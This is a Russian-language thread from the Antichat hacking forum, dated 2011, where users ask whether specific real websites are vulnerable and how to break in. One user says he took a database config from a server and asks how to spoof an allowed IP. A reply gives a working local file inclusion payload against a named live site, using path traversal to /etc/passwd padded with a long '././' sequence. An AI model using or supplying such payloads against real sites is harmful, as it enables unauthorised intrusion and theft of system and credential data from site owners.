ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.02.2011, 18:49
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Samael91
Samael91 said:
Подскажите пожалуйста это PHP-inj?
http://smsa.net.ru/tv/index.php?id=1h
нет.
|
|
|
02.02.2011, 21:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Ребят подскажите, выдрал с сервера конфиг зенда, следующего вида
db.adapter = "pdo_mysql"
db.host = "blabla"
db.port = "3306"
db.username = "blabla"
db.password = "blabla"
db.dbname = "blabla"
db.charset ="utf8"
Порт из вне открыт к дб, а вот коннект сделать не могу, прочитал в разделе коддинга, что может быть строка в дб adress(то есть ip с которых можно подключиться к дб.) один разрешенный ip знаю, как подделать коннект с тем ip что знаю? или моя идея бредовая?
|
|
|
|
02.02.2011, 22:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
1289
Репутация:
0
|
|
Здравствуйте, не могли бы вы подсказать ?
выдает на страничке:
Warning: include_once(../config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1
Warning: include_once() [function.include]: Failed opening '../config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1
Это несет в себе уязвимость ?
|
|
|
|
02.02.2011, 22:47
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Zalepoks
Zalepoks said:
Здравствуйте, не могли бы вы подсказать ?
выдает на страничке:
Warning: include_once(../config.php) [function.include-once]: failed to open stream: No such file or directory in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1
Warning: include_once() [function.include]: Failed opening '../config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /www/ontariow/www/htdocs/usercp/store/addbal.php on line 1
Это несет в себе уязвимость ?
информация очень скудна...при каких обстоятельствах появилось данное сообщение? что делал? и как? с такой инфой тебе никто ничего не скажет, экстрасенсов на форуме не наблюдал
|
|
|
|
03.02.2011, 00:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
1289
Репутация:
0
|
|
это лк фришного айона ontarioworld.ru/usercp
дижок как бы dle. а ошибка вылазит в
http://ontarioworld.ru/usercp/prem.php?p=addbal
также есть ошибка в
http://ontarioworld.ru/usercp/cp.php
в отсальном дыр нет
Сильно не пинайте если что-то не так описал
|
|
|
|
03.02.2011, 00:27
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Zalepoks
Zalepoks said:
это лк фришного айона ontarioworld.ru/usercp
дижок как бы dle. а ошибка вылазит в
http://ontarioworld.ru/usercp/prem.php?p=addbal
также есть ошибка в
http://ontarioworld.ru/usercp/cp.php
в отсальном дыр нет
Сильно не пинайте если что-то не так описал
ну смотри, если на сайте есть какая нибудь ошибка, вернее текст какой нить ошибки без каких либо действий со стороны пользователя (имею в виду подставление ковычки, иаменение пост или гет запроса) , то это не значит что на ресурсе есть уязвимость..может она на данном ресурсе и есть.. но за тебя никто ничего делать не будет, предпринимай действия...и тогда уже обращайся
|
|
|
|
03.02.2011, 00:32
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Zalepoks
Код:
Code:
http://ontarioworld.ru/usercp/prem.php?p=../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
Сообщение от Lasteeck
Lasteeck said:
если на сайте уже присутствует ошибка насколько я знаю, то сайт уже хакнут кем то
Флуданул,доволен?Тут люди вопросы задают,а ты какой-то бред несешь про ошибки,даже сам не понимая про что говоришь!!111
Если ошибка на сайте,то сайт хекнут,акуеть логика!11
Думаешь блеснул своим хекирским мастерством и показал смекалку,ответив в этой теме?Ты только лишний раз показал обратное...
|
|
|
|
03.02.2011, 01:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Ребят никто так и не ответил на мой пост /showthread.php?p=2539364#post2539364, логику не понимаю, тут тема для флуда и гнобения других мемберов?
|
|
|
|
03.02.2011, 01:17
|
|
Познающий
Регистрация: 05.04.2010
Сообщений: 30
Провел на форуме:
151946
Репутация:
2
|
|
Сообщение от Lijzer
Lijzer said:
Ребят никто так и не ответил на мой пост /showthread.php?p=2539364#post2539364, логику не понимаю, тут тема для флуда и гнобения других мемберов?
не несет никакой уязвимости
|
|
|
|
03.02.2011, 01:26
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
Парни, остыньте.
Сообщение от Lijzer
Lijzer said:
Ребят подскажите, выдрал с сервера конфиг зенда, следующего вида
db.adapter = "pdo_mysql"
db.host = "blabla"
db.port = "3306"
db.username = "blabla"
db.password = "blabla"
db.dbname = "blabla"
db.charset ="utf8"
Порт из вне открыт к дб, а вот коннект сделать не могу, прочитал в разделе коддинга, что может быть строка в дб adress(то есть ip с которых можно подключиться к дб.) один разрешенный ip знаю, как подделать коннект с тем ip что знаю? или моя идея бредовая?
Вполне возможно, что так и есть.
Тогда ниче ты не сделаешь, там даже может быть IP локалхоста или локальный IP из их подсети.
IP спуфинг невозможен. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
